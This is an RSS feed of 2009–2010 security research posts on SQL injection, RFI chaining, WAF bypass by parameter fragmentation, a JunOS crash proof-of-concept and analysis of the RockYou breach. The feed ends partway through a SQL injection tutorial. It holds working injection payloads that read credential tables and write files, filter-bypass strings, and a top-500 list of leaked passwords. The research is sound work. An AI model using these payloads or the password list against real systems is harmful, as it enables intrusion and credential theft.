<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>RFI over SQL Injection Cross-Site Scripting</title><description>2010-01-12 14:19:31 - Positive Technologies Research Lab: An amusing attack was demonstrated in the course of the last penetration testing. It is a good example of practical application of Cross-Site Scripting. We had the following situation: - a user segment with an attacker (me) operating from it; - a technological network with strictly restricted outgoing traffic; - a web application in the technological network that is vulnerable to Remote File Including (RFI); - a web application in the technological network that is vulnerable to SQL Injection. SQL Injection per se didn't allow us to exploit any useful threats and develop the attack (here it is, the dreadful effect of privilege minimization). We also could not use the RFI vulnerability, because the traffic outgoing from the technological segment to the user segment and to the external environment was strictly restricted. For the purpose of exploitation of the RFI vulnerability, a chain like the following one was implemented: http://…/?param=http://…/?param=1 union select '' That is, each of these three vulnerabilities taken separately was useless. Only when they were combined for the common good purpose, they allowed us to exploit an information security threat, which was execution of arbitrary commands on the server. [image] All in all, there is nothing supernatural here, but I found this attack to be rather amusing.</description><link>http://www.secuobs.com/revue/news/180657.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/180657.shtml</guid></item>
<item><title>Magic Quotes</title><description>Secuobs.com : 2010-01-11 22:10:20 - Positive Technologies Research Lab - [image] In the course of the last penetration testing, I had an occasion to work with the following web application architecture. I guess you will ask me, what's wrong here? The problem is that Oracle is not MySQL, and it simply doesn't "know" about any shielding in the form of backslashes (Oracle doesn't consider the concept of shielding at all, because it's a serious DBMS). [image] It should be mentioned that we have met a lot of Oracle DBMSs during the last penetration testing, and most of them contained the described vulnerability, i.e. they had a universal login ('or 1=1 --), aka SQL Injection. A similar feature of interpretation of a backslash (\) as an independent symbol is characteristic for Microsoft SQL Server, too. [image] For the Sybase database, we have: [image] Thus, it is necessary to take such features of DBMSs into account in the course of programming and porting your applications to various databases to avoid problems relating to SQL Injection. Comment: this topic was described by Bernardo Damele [1,2] in his blog one year ago, but the practice shows that the problem is still urgent.</description><link>http://www.secuobs.com/revue/news/180386.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/180386.shtml</guid></item>
<item><title>Methods of Quick Exploitation of Blind SQL Injection</title><description>Secuobs.com : 2010-01-11 11:43:55 - Positive Technologies Research Lab - A couple of days ago TinKode attracted everybody's attention by breaking a web site in the domain army.mil. The server onestop.army.mil was attacked and the investigator found a Blind SQL Injection vulnerability on it. A logically true query: [image] A logically false query: [image] This time, I was most interested not in the fact of server compromise, but in the applied technique of exploitation of a Blind SQL Injection vulnerability at DBMS MSSQL 2000. [image] Thus, if casting via the function convert() is unsuccessful, then MSSQL will place useful data into the error message. Testing of a later version, MSSQL 2005, showed that the technique used by TinKode is applicable to it, too:

select convert(int,@@version);
select convert(int,(select table_name from (select row_number() over (order by table_name) as rownum,table_name from information_schema.tables) as t where t.rownum=1));
select convert(int,(select table_name from (select row_number() over (order by table_name) as rownum,table_name from information_schema.tables) as t where t.rownum=2));

[image] Similar manipulations with casting were conducted for a widespread DBMS, MySQL. The experiment showed that in case of unsuccessful casting, MySQL returns a non-critical notification that cannot be used to achieve the same results for Blind SQL Injection exploitation:

mysql> select cast('str1' as char);
+----------------------+
| cast('str1' as char) |
+----------------------+
| str1                 |
+----------------------+
1 row in set (0.00 sec)

mysql> select cast('str1' as decimal);
+-------------------------+
| cast('str1' as decimal) |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set, 1 warning (0.01 sec)

mysql> show warnings;
+---------+------+-------------------------------------------+
| Level   | Code | Message                                   |
+---------+------+-------------------------------------------+
| Warning | 1292 | Truncated incorrect DECIMAL value: 'str1' |
+---------+------+-------------------------------------------+
1 row in set (0.00 sec)

mysql> select convert('str2',char);
+----------------------+
| convert('str2',char) |
+----------------------+
| str2                 |
+----------------------+
1 row in set (0.00 sec)

mysql> select convert('str2',decimal);
+-------------------------+
| convert('str2',decimal) |
+-------------------------+
|                       0 |
+-------------------------+
1 row in set, 1 warning (0.00 sec)

mysql> show warnings;
+---------+------+-------------------------------------------+
| Level   | Code | Message                                   |
+---------+------+-------------------------------------------+
| Warning | 1292 | Truncated incorrect DECIMAL value: 'str2' |
+---------+------+-------------------------------------------+
1 row in set (0.00 sec)

Well and good. But then, the universal exploitation technique by Qwazar is applicable to all MySQL versions:

select count(*),concat(version(),floor(rand(0)*2))x from table group by x;
select count(*),concat((select user from mysql.user limit 0,1),floor(rand(0)*2))x from mysql.user group by x;
select count(*),concat((select user from mysql.user limit 1,1),floor(rand(0)*2))x from mysql.user group by x;
select 1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1);

[image] Using one such request, an attacker can obtain up to 64 bytes of useful data from the error message. This technique can be used for MySQL >= v3.x. [image] Further experiments with the technique proposed by TinKode showed that this method can be applied to PostgreSQL, too:

select cast(version() as numeric);
select cast((select table_name from information_schema.tables limit 1 offset 0) as numeric);
select cast((select table_name from information_schema.tables limit 1 offset 1) as numeric);

[image] Like MSSQL, PostgreSQL doesn't seriously restrict the length of the data returned within an error message. If the function pg_last_error() is not called within the context of PHP, but error_reporting is still enabled, then one query allows an attacker to obtain up to 1229 bytes of useful data from the error message generated by PHP. Unfortunately, such tricks will not work with Oracle. [image] It is necessary to consider this DBMS.</description><link>http://www.secuobs.com/revue/news/180164.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/180164.shtml</guid></item>
<item><title>Juniper JUNOS Remote Kernel Crash Flaw</title><description>Secuobs.com : 2010-01-07 17:34:41 - Positive Technologies Research Lab - "Juniper Networks is warning customers of a critical flaw in its gateway routers that allows attackers to crash the devices by sending them small amounts of easily-spoofed traffic" - The Register news. The JunOS kernel will crash (i.e. core) when a specifically crafted TCP option is received on a listening TCP port. The packet cannot be filtered with Junos's firewall filter. A router receiving this specific TCP packet will crash and reboot. Affected Devices: JunOS 3.x - 10.x (versions released later than 1/28/2009). Software releases built on or after January 28, 2009 have already fixed the issue. Solution: Upgrade the OS. There are no totally effective workarounds. Funny: "A Juniper spokeswoman said the bulletin was one of seven security advisories the company issued under a policy designed to prevent members of the public at large from getting details of the vulnerabilities. 'Because of Juniper's "Entitled Disclosure Policy," only our customers and partners are allowed access to the details of the Security Advisory,' the spokeswoman wrote." Ooohhh! How about this: "when a specifically crafted TCP option is received on a listening TCP port". It's more than enough. We have 256 guesses. Simple Proof-of-Concept demo:

hod$ ping 16925411
PING 16925411 (16925411): 56 data bytes
64 bytes from 16925411: icmp_seq=0 ttl=254 time=4623 ms
64 bytes from 16925411: icmp_seq=1 ttl=254 time=4531 ms
64 bytes from 16925411: icmp_seq=2 ttl=254 time=4315 ms
^C
hod$ hod-junos-test 16925411 22
Target IP: 16925411, Port: 22
Sending TCP-packets with various crafted TCP options...
TCP options bruteforce progress ......... OK
hod$ ping 16925411
PING 16925411 (16925411): 56 data bytes
Request timeout for icmp_seq 0
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
^C

256 packets and the JunOS router is dead, and after analyzing the sniffed traffic we know the true "evil" TCP packet. The JUNOS firewall filter (ACL) is unable to filter a TCP packet with this issue. Successful exploitation requires knowledge of a listening remote TCP port (opened or firewall filtered, it doesn't matter at all). For example, attackers can send (blind) a large number of crafted packets to "well known" TCP ports: 22 SSH, 179 BGP and others. And that's enough.</description><link>http://www.secuobs.com/revue/news/179219.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/179219.shtml</guid></item>
<item><title>WASC Threat Classification v2.0 is Out</title><description>Secuobs.com : 2010-01-05 20:18:05 - Positive Technologies Research Lab - "The Threat Classification is an effort to classify the weaknesses, and attacks that can lead to the compromise of a website, its data, or its users." The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues. WASC Threat Classification v2.0 Online: http://projects.webappsec.org/Threat-Classification What's new in the Threat Classification v2: - Expanded Mission Statement; - Clarified terminology; - Proper Classification of threats into Attacks and Weaknesses for static core view; - Base foundation allowing for the introduction of views into future releases.</description><link>http://www.secuobs.com/revue/news/178462.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/178462.shtml</guid></item>
<item><title>Over 32 million accounts have been compromised: the result of an attack on the RockYou.com site</title><description>Secuobs.com : 2009-12-29 13:07:34 - Positive Technologies Research Lab - It was discovered that the hacker under the pseudonym "igigi" managed to compromise the database of users of the web site RockYou.com via classical SQL Injection exploitation. The portal RockYou.com offers various services to social networks such as Facebook and MySpace. Igigi describes in detail the conducted attack in his blog. The most valuable data received by the hacker is the database of users consisting of 32 603 388 records. The depersonalized database (without usernames, emails, and other sensitive information) was kindly downloaded to rapidshare.com, but has already been removed from there and is now available only on torrents. It should be mentioned that this incident got into the TOP5 of the greatest information leakages for the past year. The RockYou team apologized to their users and assured them that the incident didn't affect the privacy of their financial information. It was also reported that the vulnerabilities will be eliminated and henceforth the security issues will be attended to much more carefully (compliance with industry standards in information security, applying best practices, etc.). However, information protection is based today on the principle "one vulnerability eliminated, another one forgotten". Well, let us return to the information leakage. Yours truly couldn't help trying to get hold of such an interesting password database, which is now roaming in our boundless space. Thus, I present to your attention the analysis of a scope of 32 603 388 passwords. The results for the symbol set used (charset) are the following: Here is a graph of the length of passwords used by foreign users: Below is the most interesting thing - the TOP500 of the most widespread passwords from the compromised database of RockYou.com (password - percentage):

1. 123456 - 0,6547%; 2. password - 0,2789%; 3. iloveyou - 0,1791%; 4. princess - 0,1296%; 5. 123456789 - 0,1131%; 6. 12345 - 0,1106%; 7. rockyou - 0,0697%; 8. nicole - 0,0666%; 9. abc123 - 0,0657%; 10. monkey - 0,0648%;
11. ashley - 0,0593%; 12. babygirl - 0,0592%; 13. jessica - 0,0585%; 14. michael - 0,0555%; 15. tigger - 0,0547%; 16. soccer - 0,0535%; 17. michelle - 0,0526%; 18. password1 - 0,0522%; 19. sunshine - 0,0504%; 20. qwerty - 0,0486%;
21. iloveu - 0,0480%; 22. daniel - 0,0458%; 23. LOVELY - 0,0458%; 24. 12345678 - 0,0456%; 25. FRIENDS - 0,0449%; 26. purple - 0,0448%; 27. jordan - 0,0440%; 28. anthony - 0,0436%; 29. justin - 0,0435%; 30. chocolate - 0,0432%;
31. butterfly - 0,0431%; 32. football - 0,0417%; 33. liverpool - 0,0409%; 34. bubbles - 0,0401%; 35. amanda - 0,0401%; 36. basketball - 0,0400%; 37. 1234567 - 0,0399%; 38. jennifer - 0,0383%; 39. fuckyou - 0,0371%; 40. hottie - 0,0370%;
41. andrew - 0,0359%; 42. hannah - 0,0354%; 43. tweety - 0,0347%; 44. loveme - 0,0346%; 45. PLAYBOY - 0,0345%; 46. joshua - 0,0342%; 47. danielle - 0,0341%; 48. charlie - 0,0341%; 49. superman - 0,0340%; 50. chelsea - 0,0336%;
51. TINKERBELL - 0,0328%; 52. 654321 - 0,0324%; 53. brandon - 0,0324%; 54. jasmine - 0,0320%; 55. softball - 0,0319%; 56. matthew - 0,0316%; 57. lauren - 0,0314%; 58. flower - 0,0314%; 59. EMINEM - 0,0313%; 60. angels - 0,0313%;
61. samantha - 0,0307%; 62. angel - 0,0305%; 63. secret - 0,0302%; 64. whatever - 0,0299%; 65. elizabeth - 0,0297%; 66. summer - 0,0287%; 67. melissa - 0,0286%; 68. taylor - 0,0282%; 69. cookie - 0,0282%; 70. hello - 0,0280%;
71. shadow - 0,0278%; 72. pretty - 0,0274%; 73. robert - 0,0272%; 74. dancer - 0,0272%; 75. yellow - 0,0270%; 76. computer - 0,0264%; 77. 111111 - 0,0263%; 78. 000000 - 0,0254%; 79. mickey - 0,0253%; 80. spongebob - 0,0252%;
81. iloveme - 0,0247%; 82. barbie - 0,0246%; 83. poohbear - 0,0245%; 84. andrea - 0,0244%; 85. loveyou - 0,0243%; 86. family - 0,0242%; 87. thomas - 0,0242%; 88. lovers - 0,0240%; 89. JONATHAN - 0,0239%; 90. brittany - 0,0236%;
91. joseph - 0,0235%; 92. rangers - 0,0235%; 93. shorty - 0,0231%; 94. 123123 - 0,0229%; 95. william - 0,0228%; 96. heather - 0,0226%; 97. louise - 0,0225%; 98. forever - 0,0224%; 99. myspace - 0,0221%; 100. carlos - 0,0220%;
101. patrick - 0,0218%; 102. orange - 0,0217%; 103. princess1 - 0,0216%; 104. alexis - 0,0216%; 105. buster - 0,0213%; 106. destiny - 0,0211%; 107. nathan - 0,0211%; 108. diamond - 0,0211%; 109. CHEESE - 0,0211%; 110. pictures - 0,0209%;
111. chicken - 0,0207%; 112. rachel - 0,0207%; 113. blink182 - 0,0206%; 114. steven - 0,0204%; 115. babygurl - 0,0202%; 116. ginger - 0,0202%; 117. arsenal - 0,0201%; 118. junior - 0,0201%; 119. maggie - 0,0201%; 120. dolphin - 0,0201%;
121. dragon - 0,0200%; 122. sweety - 0,0199%; 123. hunter - 0,0198%; 124. snoopy - 0,0197%; 125. pepper - 0,0196%; 126. peanut - 0,0195%; 127. cherry - 0,0194%; 128. beautiful - 0,0194%; 129. richard - 0,0193%; 130. vanessa - 0,0193%;
131. baseball - 0,0192%; 132. rainbow - 0,0191%; 133. STEPHANIE - 0,0189%; 134. kisses - 0,0189%; 135. bailey - 0,0189%; 136. angela - 0,0188%; 137. madison - 0,0186%; 138. greenday - 0,0185%; 139. morgan - 0,0183%; 140. alyssa - 0,0183%;
141. sweetie - 0,0180%; 142. christian - 0,0178%; 143. george - 0,0178%; 144. jesus - 0,0178%; 145. courtney - 0,0177%; 146. iloveyou2 - 0,0175%; 147. shannon - 0,0173%; 148. tiffany - 0,0170%; 149. sophie - 0,0169%; 150. angel1 - 0,0168%;
151. JEREMY - 0,0167%; 152. chris - 0,0166%; 153. iloveyou1 - 0,0165%; 154. jessie - 0,0165%; 155. peaches - 0,0165%; 156. mylove - 0,0165%; 157. victoria - 0,0165%; 158. austin - 0,0165%; 159. heaven - 0,0162%; 160. asshole - 0,0161%;
161. november - 0,0160%; 162. celtic - 0,0159%; 163. love - 0,0158%; 164. booboo - 0,0158%; 165. horses - 0,0158%; 166. monica - 0,0158%; 167. bowwow - 0,0157%; 168. alexander - 0,0154%; 169. batman - 0,0153%; 170. adrian - 0,0153%;
171. killer - 0,0153%; 172. 123abc - 0,0152%; 173. JESUS1 - 0,0152%; 174. rebecca - 0,0151%; 175. jackie - 0,0151%; 176. december - 0,0151%; 177. harley - 0,0151%; 178. volleyball - 0,0150%; 179. 666666 - 0,0148%; 180. natalie - 0,0148%;
181. cameron - 0,0148%; 182. scooby - 0,0148%; 183. crystal - 0,0147%; 184. precious - 0,0146%; 185. beauty - 0,0146%; 186. mother - 0,0146%; 187. kissme - 0,0144%; 188. johnny - 0,0143%; 189. martin - 0,0142%; 190. sakura - 0,0141%;
191. bitch - 0,0140%; 192. banana - 0,0140%; 193. gemini - 0,0139%; 194. mustang - 0,0139%; 195. orlando - 0,0139%; 196. miguel - 0,0138%; 197. october - 0,0137%; 198. david - 0,0137%; 199. james - 0,0137%; 200. babygirl1 - 0,0136%;
201. september - 0,0136%; 202. alexandra - 0,0136%; 203. tigers - 0,0136%; 204. casper - 0,0135%; 205. 1234567890 - 0,0135%; 206. cassie - 0,0134%; 207. christopher - 0,0134%; 208. monkey1 - 0,0134%; 209. cutiepie - 0,0134%; 210. school - 0,0133%;
211. 50cent - 0,0133%; 212. hotmail - 0,0133%; 213. gabriel - 0,0133%; 214. oliver - 0,0132%; 215. aaliyah - 0,0132%; 216. honey - 0,0132%; 217. slideshow - 0,0132%; 218. jasper - 0,0131%; 219. nicholas - 0,0131%; 220. america - 0,0131%;
221. kimberly - 0,0131%; 222. kitten - 0,0131%; 223. blondie - 0,0130%; 224. smokey - 0,0130%; 225. BROOKE - 0,0130%; 226. patricia - 0,0130%; 227. hellokitty - 0,0129%; 228. jordan23 - 0,0128%; 229. sarah - 0,0127%; 230. POOKIE - 0,0126%;
231. antonio - 0,0126%; 232. babyboy - 0,0126%; 233. sayang - 0,0126%; 234. FREEDOM - 0,0125%; 235. august - 0,0124%; 236. fuckoff - 0,0124%; 237. babyblue - 0,0123%; 238. slipknot - 0,0123%; 239. Brianna - 0,0123%; 240. denise - 0,0122%;
241. travis - 0,0122%; 242. naruto - 0,0122%; 243. SANDRA - 0,0121%; 244. silver - 0,0121%; 245. charmed - 0,0121%; 246. carolina - 0,0121%; 247. 121212 - 0,0121%; 248. strawberry - 0,0120%; 249. superstar - 0,0120%; 250. spiderman - 0,0120%;
251. monique - 0,0120%; 252. dolphins - 0,0119%; 253. apples - 0,0119%; 254. kenneth - 0,0119%; 255. flowers - 0,0119%; 256. cuteako - 0,0119%; 257. icecream - 0,0118%; 258. chester - 0,0118%; 259. prince - 0,0117%; 260. olivia - 0,0117%;
261. fucker - 0,0117%; 262. edward - 0,0116%; 263. myspace1 - 0,0115%; 264. alicia - 0,0115%; 265. eeyore - 0,0115%; 266. michael1 - 0,0115%; 267. newyork - 0,0114%; 268. ronaldo - 0,0114%; 269. midnight - 0,0114%; 270. friend - 0,0114%;
271. lollipop - 0,0114%; 272. adidas - 0,0113%; 273. jackson - 0,0113%; 274. master - 0,0113%; 275. gangsta - 0,0113%; 276. inuyasha - 0,0112%; 277. mahalkita - 0,0112%; 278. chrisbrown - 0,0112%; 279. stephen - 0,0112%; 280. nicole1 - 0,0112%;
281. muffin - 0,0111%; 282. skittles - 0,0111%; 283. lakers - 0,0111%; 284. christine - 0,0110%; 285. angelo - 0,0110%; 286. PIGLET - 0,0109%; 287. cutie - 0,0109%; 288. minnie - 0,0109%; 289. samsung - 0,0109%; 290. BROOKLYN - 0,0108%;
291. charles - 0,0108%; 292. JANUARY - 0,0107%; 293. dakota - 0,0107%; 294. mahalko - 0,0106%; 295. ladybug - 0,0106%; 296. kelsey - 0,0106%; 297. chris1 - 0,0106%; 298. cookies - 0,0106%; 299. rebelde - 0,0106%; 300. anthony1 - 0,0106%;
301. manuel - 0,0105%; 302. pokemon - 0,0105%; 303. marcus - 0,0105%; 304. INTERNET - 0,0105%; 305. westlife - 0,0105%; 306. pimpin - 0,0105%; 307. jason - 0,0105%; 308. pamela - 0,0104%; 309. iverson - 0,0104%; 310. catherine - 0,0104%;
311. babydoll - 0,0104%; 312. popcorn - 0,0103%; 313. snickers - 0,0103%; 314. manutd - 0,0103%; 315. smiley - 0,0103%; 316. omarion - 0,0103%; 317. dennis - 0,0103%; 318. hockey - 0,0102%; 319. mybaby - 0,0102%; 320. angelica - 0,0102%;
321. shelby - 0,0102%; 322. fluffy - 0,0102%; 323. daniela - 0,0102%; 324. katie - 0,0102%; 325. 789456 - 0,0102%; 326. benjamin - 0,0102%; 327. ihateyou - 0,0102%; 328. elephant - 0,0101%; 329. marvin - 0,0101%; 330. scooter - 0,0101%;
331. bitch1 - 0,0101%; 332. garfield - 0,0101%; 333. 123321 - 0,0100%; 334. scorpio - 0,0100%; 335. veronica - 0,0100%; 336. 5201314 - 0,0100%; 337. 987654321 - 0,0099%; 338. princesa - 0,0099%; 339. jeffrey - 0,0099%; 340. katherine - 0,0099%;
341. loser - 0,0098%; 342. christina - 0,0098%; 343. melanie - 0,0098%; 344. ricardo - 0,0098%; 345. mexico - 0,0098%; 346. 112233 - 0,0098%; 347. kevin - 0,0098%; 348. nirvana - 0,0098%; 349. samuel - 0,0098%; 350. sabrina - 0,0097%;
351. 159753 - 0,0097%; 352. rockstar - 0,0097%; 353. scotland - 0,0097%; 354. teamo - 0,0097%; 355. england - 0,0097%; 356. harrypotter - 0,0097%; 357. johncena - 0,0096%; 358. victor - 0,0096%; 359. raymond - 0,0096%; 360. britney - 0,0096%;
361. turtle - 0,0096%; 362. vincent - 0,0096%; 363. tequiero - 0,0095%; 364. frankie - 0,0095%; 365. Francis - 0,0095%; 366. YANKEES - 0,0095%; 367. welcome - 0,0095%; 368. soccer1 - 0,0094%; 369. zxcvbnm - 0,0094%; 370. charlotte - 0,0094%;
371. hottie1 - 0,0094%; 372. cristina - 0,0094%; 373. bonnie - 0,0094%; 374. FERNANDO - 0,0094%; 375. bianca - 0,0094%; 376. bubble - 0,0093%; 377. tintin - 0,0093%; 378. letmein - 0,0093%; 379. jayjay - 0,0093%; 380. CARMEN - 0,0093%;
381. shopping - 0,0093%; 382. estrella - 0,0093%; 383. maganda - 0,0093%; 384. sweet - 0,0092%; 385. swimming - 0,0092%; 386. single - 0,0092%; 387. tennis - 0,0092%; 388. winnie - 0,0091%; 389. 696969 - 0,0091%; 390. number1 - 0,0091%;
391. 123456a - 0,0091%; 392. red123 - 0,0091%; 393. rockon - 0,0091%; 394. london - 0,0090%; 395. people - 0,0090%; 396. dallas - 0,0090%; 397. christ - 0,0090%; 398. fuckyou1 - 0,0090%; 399. cancer - 0,0090%; 400. asdfgh - 0,0090%;
401. pumpkin - 0,0090%; 402. claudia - 0,0089%; 403. iloveu2 - 0,0089%; 404. love123 - 0,0089%; 405. natasha - 0,0089%; 406. player - 0,0089%; 407. brandy - 0,0089%; 408. justin1 - 0,0089%; 409. portugal - 0,0089%; 410. simple - 0,0089%;
411. katrina - 0,0089%; 412. FLORIDA - 0,0089%; 413. monkeys - 0,0088%; 414. teddybear - 0,0088%; 415. emily - 0,0088%; 416. lucky1 - 0,0088%; 417. megan - 0,0088%; 418. marie - 0,0088%; 419. Barney - 0,0088%; 420. dexter - 0,0088%;
421. badboy - 0,0087%; 422. sparky - 0,0087%; 423. stupid - 0,0087%; 424. hiphop - 0,0087%; 425. millie - 0,0087%; 426. 987654 - 0,0087%; 427. smiles - 0,0087%; 428. nikki - 0,0087%; 429. MERCEDES - 0,0086%; 430. Claire - 0,0086%;
431. abigail - 0,0086%; 432. alejandro - 0,0086%; 433. california - 0,0086%; 434. mariah - 0,0086%; 435. ilovehim - 0,0086%; 436. raiders - 0,0086%; 437. JEROME - 0,0086%; 438. julian - 0,0086%; 439. brandon1 - 0,0085%; 440. lalala - 0,0085%;
441. smile - 0,0085%; 442. isabel - 0,0085%; 443. lindsey - 0,0085%; 444. laura - 0,0085%; 445. hearts - 0,0084%; 446. mariposa - 0,0084%; 447. lover - 0,0084%; 448. savannah - 0,0084%; 449. carebear - 0,0084%; 450. gracie - 0,0084%;
451. westside - 0,0084%; 452. jackass - 0,0084%; 453. elijah - 0,0084%; 454. disney - 0,0084%; 455. jamie - 0,0083%; 456. allison - 0,0083%; 457. bradley - 0,0083%; 458. kristen - 0,0083%; 459. guitar - 0,0083%; 460. timothy - 0,0083%;
461. Billabong - 0,0083%; 462. baller - 0,0083%; 463. METALLICA - 0,0083%; 464. rabbit - 0,0083%; 465. babyko - 0,0083%; 466. gandako - 0,0083%; 467. robbie - 0,0083%; 468. leslie - 0,0083%; 469. lindsay - 0,0083%; 470. amber - 0,0083%;
471. 7777777 - 0,0083%; 472. truelove - 0,0082%; 473. hello1 - 0,0082%; 474. benfica - 0,0082%; 475. tyler - 0,0082%; 476. bandit - 0,0081%; 477. jayson - 0,0081%; 478. dustin - 0,0081%; 479. jayden - 0,0081%; 480. pebbles - 0,0081%;
481. sweets - 0,0081%; 482. alejandra - 0,0081%; 483. trinity - 0,0081%; 484. dance - 0,0081%; 485. sweetheart - 0,0080%; 486. kitty - 0,0080%; 487. hahaha - 0,0080%; 488. 222222 - 0,0080%; 489. tigger1 - 0,0080%; 490. abcdef - 0,0079%;
491. albert - 0,0079%; 492. jordan1 - 0,0079%; 493. ronald - 0,0079%; 494. kathleen - 0,0079%; 495. sexygirl - 0,0079%; 496. sebastian - 0,0079%; 497. froggy - 0,0079%; 498. ashley1 - 0,0079%; 499. charlie1 - 0,0079%; 500. sunshine1 - 0,0079%.

A more interesting comparative analysis of all available password scopes will be published in the beginning of the next year within the bounds of "Analysis of password protection issues" (and not only in Russian companies).</description><link>http://www.secuobs.com/revue/news/176378.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/176378.shtml</guid></item>
<item><title>HTTP Parameter Fragmentation (HPF) is one of the methods to bypass security filters in web applications</title><description>Secuobs.com : 2009-12-28 13:28:40 - Positive Technologies Research Lab - The idea to use HTTP Parameter Fragmentation (HPF) when calling a web application for the purpose of bypassing security filters (particularly, WAFs) is not a new one. According to one of the participants of the WASC Mailing List, this technique can occasionally be found among exploits published at the site milw0rm.com. However, application of this method allows one to successfully bypass filters used in most modern WAFs (particularly, a productive one - mod_security). So, what is the essence of this technique? Let us consider it by examples of SQL Injection exploitation. It is often necessary to have two or more user parameters in one SQL query, for example:

At the stage of verifying the parameter values received from the user on the level of the web application, the application is capable of operating with variables of the web server only, and a WAF (depending on the mode) is capable of operating directly with raw HTTP data. However, regardless of the method of accessing data, it comes to using certain regular expressions (regexps) for each separate parameter, i.e.:

Thus, if one divides the logic of the SQL query among several parameters that enter this SQL query and then concatenates these pieces using comments, it will become possible to bypass the described filters:

/?a=1 union/*&amp;b=*/select 1,2
/?a=1 union/*&amp;b=*/select 1,pass/*&amp;c=*/from users

Here, regexps will not work. SQL queries become:

Since comments are ignored, the queries in fact are:

select * from table where a=1 union select 1,2
select * from table where a=1 union select 1,pass from users

One can notice that, considering the attack vector, HPF is very similar to HPP (HTTP Parameter Pollution), but in contrast to the latter one, the HPP implementation is aimed at exploitation of a vulnerability in the web application, not in the application environment. Of course, both attack methods can supplement each other. For example, a combination of the two techniques can be used if SQL code is sequentially injected into two SQL queries. Let us assume that output is displayed only if both queries don't return a DB error. Then it becomes possible to combine the HPP and HPF methods and use "union" instead of Blind SQL Injection. Here is an example:

/?a=1 union/*&amp;a=*/select 1,2/*&amp;b=*/,3

SQL queries will take on a correct form:

select id,user,email from table where a=1 union select 1,2,3
select id,user from table where a=1 union select 1,2

Sources: antichat, http://forum.antichat.ru/showpost.php?p=911841&amp;postcount=2; antichat, http://forum.antichat.ru/showpost.php?p=970729&amp;postcount=3; OWASP EU09, Luca Carettoni, Stefano di Paola, http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf; Lavakumar Kuppan, http://lavakumar.com/Split_and_Join.pdf; WASC Mailing List, http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html; CC09, Dmitry Evteev, http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf; Dmitry Evteev blog, http://devteev.blogspot.com/2009/09/http-parameter-fragmentation-hpf-web.html</description><link>http://www.secuobs.com/revue/news/176109.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/176109.shtml</guid></item>
<item><title>(Non-)blind SQL Injection</title><description>Secuobs.com : 2009-12-24 12:31:49 - Positive Technologies Research Lab - Introduction. SQL Injection is a method of attacking a database through a web application, bypassing firewalls. In this method, the parameters transmitted to the database via the web application are modified so that the executed SQL query changes. To conduct an SQL Injection attack, every possible way of interacting with the application (GET, POST, COOKIE, etc.) is used. Attacks can be conducted for the following purposes: 1. Access data that is usually inaccessible, or obtain system configuration data that can be used to develop the attack vector. For example, a modified SQL query returns user password hashes, which are subsequently recovered by brute-force search. 2. Access other systems through the computer hosting the database. Attacks of this sort can be conducted using database procedures and 3GL extensions that allow interaction with the operating and file systems. SQL Injections can be divided into the following three groups according to the exploitation technique: 1. Classical SQL Injection; 2. Blind SQL Injection; 3. Double Blind SQL Injection (TIME-based). Let us consider each of these techniques in detail. Since SQL Injection exploitation strongly depends on the dialect of the structured query language (SQL) in use, we will confine ourselves to the most widespread database, MySQL. Moreover, we will assume that the SQL Injection attack is conducted via a SELECT query, not via INSERT or others. Classical SQL Injection. In the first place, classical exploitation of SQL Injection vulnerabilities provides an opportunity to merge two SQL queries in order to obtain additional data from a certain table. If a classical SQL Injection attack is possible, it becomes much easier to get useful information from the database management system (DBMS). Attacks of this type usually exploit the union operator. If the body of the returned page can include only one entry from the table, one can use the technique of line-by-line reading: id=1 limit 0 union select login,password from users limit 0,1 and id=1 limit 0 union select login,password from users limit 1,1; or: id=1 limit 0 union select login,password from users limit 1 offset 0 and id=1 limit 0 union select login,password from users limit 1 offset 1. Admittedly, obtaining data from a large table is a rather long process with this approach. Therefore, when the user whose account is used to execute queries to MySQL has the file_priv privilege, it becomes possible to write the output of the SELECT query into a file: id=1 limit 0 union select login,password from users into outfile '/tmp/users' or id=1 limit 0 union select login,password from users into dumpfile '/tmp/users'. Actually, the ability to work with the file system during SQL Injection exploitation represents a step towards the ability to execute commands on the server. This is why SQL Injection vulnerabilities belong to the Command Execution class in standard terminology. When the SQL query used for injection is executed against a table with a limited number of columns, one can use the data concatenation functions concat() and concat_ws(): id=1 limit 0 union select concat(login,password) from users and id=1 union select concat_ws(' ',login,password) from users. In cases when the injected query is followed by the remains of the good SQL query, one can remove this garbage using comments: id=1 union select login,password from users--, id=1 union select login,password from users/* or id=1 union select login,password from users#. Everything was simple and easy until the moment when strict administrators started using various security filters (aka WAFs, Web Application Firewalls) to protect vulnerable web applications. These filters generally apply signature analysis, which is their central weakness. In many cases, the capabilities of SQL allow one to bypass the filtering of incoming data. For example, it is amusing to observe that KIS 2009 forbids this query: id=1 union select password from users, while the following queries are let through without any reaction: id=1 union select passwd from users, id=1 union select pass from users, id=1 union select password from user, id=1 union select login from users--, et alia. But what can we do if it is necessary to use exactly the column called password and the table called users? One possible way is to exploit the vulnerability using the blind method: id=1 and 1=if(ord(lower(mid((select password from users limit 0,1),1,1)))=NUM,1,2)--. In this case the KIS filter is bypassed even more elegantly: the signature reacts only to the strings password and users that follow the keyword union. Taking this peculiarity into account, we can build the following query that bypasses the filter: id=1 and (select @v:=password from users limit 0,1) union select @v--, id=1 and (select @v:=password from users limit 1,1) union select @v--, etc. However, sometimes it is impossible to influence the data returned by the application while conducting an SQL Injection attack. In these cases the vulnerability is 